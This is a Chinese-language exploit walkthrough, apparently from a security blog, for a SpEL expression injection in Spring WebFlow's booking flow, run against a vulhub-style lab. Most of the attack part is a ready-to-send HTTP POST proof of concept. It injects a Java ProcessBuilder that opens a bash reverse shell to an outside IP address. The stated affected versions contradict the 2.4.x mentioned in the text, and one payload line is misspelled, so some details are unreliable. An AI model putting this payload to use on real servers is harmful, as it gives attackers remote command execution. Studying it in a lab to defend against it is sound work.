影响版本:
2.0.0-2.0.9 ;1.0.0-1.0.5
漏洞简述:
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
漏洞利用:
1、输入账号密码登录(左侧有)
2、点击findhotel
3、随便点击一个
4、点击book hotel
5、随便输入信息16个数字,其他信息任意,然后点击proceed
6、来到此界面就可以打开burpsuite,进行点击confirm进行抓包了
7、构造的数据内容如下:
###&_(new+jaca.lang.ProcessBuilder(cmd)).start()=vulhub cmd就是要执行的命令
_eventId_confirm=&_csrf=c74d1ef4-ff53-4e15-b38d-e2c00a8212f4&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/47.108.160.30/8888+0>%261")).start()=vulhub
POC:
POST /hotels/booking?execution=e2s2 HTTP/1.1
Host: 123.58.224.8:26956
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Origin: http://123.58.224.8:26956
Connection: close
Referer: http://123.58.224.8:26956/hotels/booking?execution=e2s2
Cookie: JSESSIONID=B42AC09B2FBE4F44347A8D6D2A8D3C77
Upgrade-Insecure-Requests: 1
_eventId_confirm=&_csrf=c74d1ef4-ff53-4e15-b38d-e2c00a8212f4&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/47.108.160.30/8888+0>%261")).start()=vulhub
可以看到成功反弹shell
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)